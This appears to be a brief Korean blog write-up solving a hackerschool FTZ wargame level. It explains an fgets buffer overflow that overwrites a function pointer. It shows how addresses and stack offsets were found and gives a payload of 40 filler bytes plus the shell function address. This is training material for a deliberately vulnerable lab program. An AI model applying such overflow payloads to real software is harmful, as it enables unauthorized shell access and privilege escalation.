문제 분석
1. fgets bof
2. *call = shell
풀이
1. shell 함수 주소 확인 : 0x80484d0
readelf -s attackme | grep shell
attackme 파일의 심볼 테이블 중 shell이 들어간 문자열 출력
2. buf 주소 확인 : ebp-56
call 주소 확인 : ebp-16
0xffffffc8(%ebp) = ebp-56
0xfffffff0(%ebp) = ebp-16
3. payload = dummy(40bytes) + shell_addr
= "a"*40 + 0x80484d0
'시스템 > FTZ' 카테고리의 다른 글
hackerschool FTZ : level 18 풀이 (0) | 2019.04.02 |
---|---|
hackerschool FTZ : level 17 풀이 (0) | 2019.04.02 |
hackerschool FTZ : level 15 풀이 (0) | 2019.04.02 |
hackerschool FTZ : level 14 풀이 (0) | 2019.04.02 |
hackerschool FTZ : level 13 풀이 (0) | 2019.04.02 |